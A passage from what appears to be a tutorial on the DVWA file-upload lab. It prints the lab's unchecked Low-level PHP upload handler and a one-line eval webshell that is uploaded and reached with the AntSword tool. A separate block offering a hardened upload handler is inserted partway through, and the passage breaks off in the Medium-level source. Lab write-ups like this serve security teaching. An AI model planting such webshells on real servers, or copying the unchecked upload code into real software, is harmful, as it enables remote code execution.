Article updated: 2020-05-16
File Upload Vulnerability (File Upload)
1. Security Level: Low
1.1 Source Code
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
1.2 Attack
Now we write a one-line webshell to test the upload.
ok
<?php @eval($_POST['test']) ?>
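We try to access the file at the path shown in the upload message:
Access succeeds; next we test whether it is usable.
Here we connect using AntSword:
After adding the entry, double-click it and the data connection succeeds: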
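For contrast with the Low-level source above, a hardened handler for the same form, written as an added example (it is not DVWA's code and not from the original article). It assumes it runs inside DVWA so that DVWA_WEB_PAGE_TO_ROOT is defined; the names checked_extension, ALLOWED and MAX_BYTES, the JPEG/PNG allowlist and the 100 KB cap are choices made for this example.

```php
<?php
// Added example: hardened counterpart of the Low-level handler (not DVWA's own code).
// Assumptions: images only (JPEG/PNG), 100 KB cap, same hackable/uploads/ directory.
const ALLOWED   = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
const MAX_BYTES = 100000;

// Returns the extension to store the file under, or throws if the upload is rejected.
function checked_extension(array $file): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected');
    }
    // Decide the type from the file content, never from the client-supplied name or type.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }
    return ALLOWED[$mime];
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        $ext = checked_extension($_FILES['uploaded']);
        // Server-generated name: the client controls neither the stored name nor its extension.
        $name = bin2hex(random_bytes(16)) . '.' . $ext;
        $dest = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/' . $name;
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $dest)) {
            throw new RuntimeException('could not store file');
        }
        echo '<pre>' . htmlspecialchars($name) . ' successfully uploaded!</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
```

The upload directory should additionally be configured so the web server never executes scripts from it, which keeps a file that slips past these checks inert.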
2. Security Level: Medium
2.1 Source Code
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded'